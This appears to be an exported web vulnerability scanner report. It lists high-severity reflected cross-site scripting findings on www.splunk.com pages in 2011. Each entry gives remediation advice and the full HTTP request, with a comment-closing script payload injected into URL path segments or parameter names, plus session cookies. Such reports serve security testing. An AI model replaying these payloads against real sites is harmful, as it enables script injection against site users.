HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:05 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:05 GMT; path=/ ETag: 5aecfdbf3d27d5a88ca8e4a82f0a45401296944225 Last-Modified: Sat, 05 Feb 2011 22:17:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ffc9--><script>alert(1)</script>7a46f80782 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/customer-case-studies/SP-CAAABB29ffc9--><script>alert(1)</script>7a46f80782 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.547. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/customer-case-studies/SP-CAAABB2
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5a778--><script>alert(1)</script>b2b3382716a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/customer-case-studies/SP-CAAABB2?5a778--><script>alert(1)</script>b2b3382716a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 453a5--><script>alert(1)</script>afa9000f934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view453a5--><script>alert(1)</script>afa9000f934/developers/SP-CAAAFR3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 73184--><script>alert(1)</script>72c4099209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers73184--><script>alert(1)</script>72c4099209d/SP-CAAAFR3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload c16b9--><script>alert(1)</script>b3aad6c14e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers/SP-CAAAFR3c16b9--><script>alert(1)</script>b3aad6c14e7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.551. http://www.splunk.com/view/developers/SP-CAAAFR3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/developers/SP-CAAAFR3
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2871d--><script>alert(1)</script>538c614736d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers/SP-CAAAFR3?2871d--><script>alert(1)</script>538c614736d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e2192--><script>alert(1)</script>66013bbc7fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe2192--><script>alert(1)</script>66013bbc7fd/education/SP-CAAAAH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload d7aa4--><script>alert(1)</script>161bc2c26b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/educationd7aa4--><script>alert(1)</script>161bc2c26b9/SP-CAAAAH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload e95e0--><script>alert(1)</script>69c3b0bc53e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/education/SP-CAAAAH9e95e0--><script>alert(1)</script>69c3b0bc53e HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.555. http://www.splunk.com/view/education/SP-CAAAAH9 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/education/SP-CAAAAH9
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3c6ea--><script>alert(1)</script>1fb748c8ba6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/education/SP-CAAAAH9?3c6ea--><script>alert(1)</script>1fb748c8ba6=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:18:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 123a7--><script>alert(1)</script>10f09601a12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view123a7--><script>alert(1)</script>10f09601a12/free-vs-enterprise/SP-CAAAE8W HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:50 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:50 GMT; path=/ ETag: 90b014140829bf9e63f05a92223e9a5e1296944090 Last-Modified: Sat, 05 Feb 2011 22:14:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3ca33--><script>alert(1)</script>316fe5dd1dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/free-vs-enterprise3ca33--><script>alert(1)</script>316fe5dd1dc/SP-CAAAE8W HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:25 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ ETag: b492f0c68842a737dbff2351eb9df2421296944125 Last-Modified: Sat, 05 Feb 2011 22:15:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a5820--><script>alert(1)</script>487a5540161 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
